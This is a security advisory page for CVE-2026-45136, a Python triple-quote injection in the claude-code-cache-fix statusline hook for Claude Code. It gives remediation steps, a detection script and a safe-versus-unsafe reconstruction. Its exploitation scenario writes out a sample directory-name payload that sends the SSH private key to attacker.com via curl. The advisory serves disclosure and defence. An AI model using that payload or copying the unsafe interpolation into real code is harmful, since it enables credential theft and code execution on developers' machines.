CVE-2026-45136: claude-code-cache-fix: hook path injection → RCE

GHSA-g3xq-3gmv-qq8g HIGH CISA: TRACK*
Published May 13, 2026
CISO Take

CVE-2026-45136 is a code injection vulnerability in the npm package claude-code-cache-fix (v3.5.0–v3.5.1), where the statusline hook script interpolates user-controlled filesystem paths directly into a Python triple-quoted string literal — a directory name containing ''' closes the literal early and executes arbitrary Python in the developer's Claude Code process. Any developer running the recommended statusLine configuration is persistently exploitable: the hook fires on every terminal redraw, meaning compromise is sustained without further action after the initial trigger. The delivery vector is frictionless — a hostile directory name lands on disk via routine git clone, npm install, or zip extraction, requiring no privileges or network access beyond what a developer already performs daily. Upgrade to v3.5.2 immediately; if patching is not immediately possible, remove the statusLine entry from ~/.claude/settings.json as a workaround, and rotate all credentials accessible on affected developer machines.

Sources: NVD, GitHub Advisory, ATLAS

What is the risk?

HIGH. While no remote vector exists, the delivery mechanism is trivial — any git repository, npm package, or archive can plant a hostile directory name. Exploitation requires zero specialized knowledge: crafting the payload is a one-liner, and the attack self-sustains on every terminal redraw without further adversary involvement. The target population is AI developers whose machines hold SSH keys, LLM API tokens (Anthropic, OpenAI), cloud provider credentials, and proprietary model artifacts — extremely high-value targets for supply chain actors. Six prior CVEs exist in the same package, suggesting this tool has a weak security track record.

How does the attack unfold?

  • Initial Access (AML.T0010.001): Attacker publishes a malicious npm package or git repository containing a directory whose name embeds a Python triple-quote injection payload.
  • Delivery (AML.T0011): Developer performs a routine npm install, git clone, or archive extraction, landing the hostile directory path on their local filesystem.
  • Exploitation (AML.T0050): Developer navigates their terminal; Claude Code fires the statusline hook, passing the hostile path into a Python triple-quoted string that closes early and executes the injected payload.
  • Impact (AML.T0112.000): Attacker achieves persistent code execution at user privilege on every statusline redraw, enabling silent exfiltration of SSH keys, API tokens, cloud credentials, and full machine compromise.

What systems are affected?

Package: Claude Code
Ecosystem: npm
Vulnerable Range: >= 3.5.0, < 3.5.2
Patched: 3.5.2

How severe is it?

CVSS 3.1: N/A
EPSS: 0.2% chance of exploitation in 30 days (higher than 9% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What should I do?

5 steps
  1. Patch: upgrade claude-code-cache-fix to v3.5.2 (published 2026-05-07) — the fix rewrites stdin handling to use a single-quoted heredoc and env var, eliminating shell interpolation entirely.

  2. Immediate workaround: remove the statusLine entry from ~/.claude/settings.json to disable the hook until patching is possible.

  3. Alternative workaround: replace tools/quota-statusline.sh with the safe heredoc+env-var pattern (export CC_INPUT=$(cat); read JSON via os.environ in Python, never via string interpolation).

  4. Detection: run npm list claude-code-cache-fix to identify versions 3.5.0 or 3.5.1; audit ~/.claude/settings.json for statusLine entries pointing to quota-statusline.sh.

  5. Incident response: if confirmed vulnerable and timeline is unknown, treat as compromised — rotate SSH keys, all LLM API keys, cloud access tokens, and any credentials stored on the developer machine.
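
A scripted form of the detection step, added here as an example rather than taken from the advisory or the project. It reads `npm list` output on stdin and inspects a settings file; the function names and the sample settings layout are assumptions, and the statusLine check matches the script name whatever shape the entry has.

```shell
#!/bin/sh
# Added triage helper for the detection step; all sample inputs are constructed.

# Read `npm list` text on stdin and print each installed version of the
# package that falls in the vulnerable range (>= 3.5.0, < 3.5.2).
vulnerable_versions() {
    grep -o 'claude-code-cache-fix@[0-9][0-9.]*' |
        sed 's/.*@//' |
        grep -E '^3\.5\.[01]$' |
        sort -u
}

# Exit 0 if the statusLine entry of the given settings file references
# quota-statusline.sh, 1 if it does not, 2 if the file cannot be parsed.
# The path travels in the environment, never inside the Python source.
statusline_uses_hook() {
    SETTINGS_PATH=$1 python3 - <<'PY'
import json, os, sys
try:
    with open(os.environ["SETTINGS_PATH"], encoding="utf-8") as fh:
        settings = json.load(fh)
except (OSError, ValueError):
    sys.exit(2)
entry = settings.get("statusLine") if isinstance(settings, dict) else None
# Serialise the entry whatever its shape and look for the script name.
hit = entry is not None and "quota-statusline.sh" in json.dumps(entry)
sys.exit(0 if hit else 1)
PY
}

# Constructed demo run (assumed settings layout, temporary file).
demo=$(mktemp -d)
printf '%s\n' '{"statusLine": {"type": "command", "command": "bash /opt/tools/quota-statusline.sh"}}' > "$demo/settings.json"
printf 'proj@1.0.0 /work/proj\n+-- claude-code-cache-fix@3.5.1\n' | vulnerable_versions
statusline_uses_hook "$demo/settings.json" && echo "statusLine hook configured"
rm -rf "$demo"
```

On a real machine, feed it with `npm list claude-code-cache-fix | vulnerable_versions` and `statusline_uses_hook ~/.claude/settings.json`.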

What does CISA's SSVC say?

Decision: Track*
Exploitation: poc
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Art. 9 - Risk management system
ISO 42001: A.10.4 - Security by design
NIST AI RMF: MANAGE 2.2 - Mechanisms to sustain and update AI risk management plans
OWASP LLM Top 10: LLM07 - Insecure Plugin Design

Frequently Asked Questions

Is CVE-2026-45136 actively exploited?

No confirmed active exploitation of CVE-2026-45136 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-45136?

This vulnerability affects the following AI/ML architecture patterns: AI development environments, Agent frameworks, AI coding assistants.

What is the CVSS score for CVE-2026-45136?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

AI development environments, Agent frameworks, AI coding assistants

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.005 AI Agent Tool
AML.T0011 User Execution
AML.T0050 Command and Scripting Interpreter
AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.10.4
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM07

What are the technical details?

Original Advisory

claude-code-cache-fix is a cache optimization proxy for Claude Code. From 3.5.0 to before 3.5.2, tools/quota-statusline.sh (introduced in v3.5.0) interpolates Claude Code's hook stdin payload directly into a Python triple-quoted string literal. A ''' byte sequence in any user-controlled field of the payload closes the literal early and lets following bytes execute as Python in the user's Claude Code process. This vulnerability is fixed in 3.5.2.
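
The interpolation described above and the heredoc plus environment-variable fix, side by side, as an added example: a reconstruction of the pattern from the advisory text, not the project's actual tools/quota-statusline.sh. The function names and sample payload are constructed; CC_INPUT and the cwd field are the names this page uses.

```shell
#!/bin/sh
# Reconstruction of the pattern in the advisory, not the project's script.

# Constructed hook payload: a directory name that contains ''' and nothing else.
SAMPLE="{\"cwd\": \"/tmp/proj/a'''b\"}"

# BEFORE: stdin is expanded by the shell into the Python source text, so a '''
# in any field ends the literal and the rest is parsed as Python.
render_unsafe() {
    payload=$(cat)
    python3 -c "
import json
data = json.loads('''$payload''')
print(data.get('cwd', ''))
"
}

# AFTER: the payload is data in an environment variable. The quoted heredoc
# delimiter ('PY') turns off shell expansion, so the Python source is constant.
render_safe() {
    CC_INPUT=$(cat)
    export CC_INPUT
    python3 - <<'PY'
import json, os
try:
    data = json.loads(os.environ.get("CC_INPUT", ""))
except ValueError:
    data = {}
print(data.get("cwd", "") if isinstance(data, dict) else "")
PY
}

# The hardened form prints the directory name verbatim; with the same input
# the generated source of the unsafe form is no longer valid Python.
printf '%s' "$SAMPLE" | render_safe
printf '%s' "$SAMPLE" | render_unsafe 2>/dev/null ||
    echo "unsafe form: generated Python no longer parses"
```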

Exploitation Scenario

An attacker contributes to or publishes an open-source AI project (npm package, GitHub repo, or sample dataset archive) that includes a directory named with a crafted payload such as: 'payload_dir/\'''+__import__(\"os\").popen(\"cat ~/.ssh/id_rsa | curl -d @- attacker.com\").read()+\''''. A developer on v3.5.0 or v3.5.1 installs or clones the project as part of normal AI development workflow. The moment the developer navigates their terminal to any workspace where the hostile path appears in cwd, workspace.current_dir, workspace.project_dir, or transcript_path fields of the hook payload, Claude Code fires the statusline hook. Python interprets the injected bytes as code, silently exfiltrates the developer's SSH private key, and the payload continues executing on every subsequent terminal redraw for the entire session.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

Timeline

Published: May 13, 2026
Last Modified: June 2, 2026
First Seen: May 13, 2026
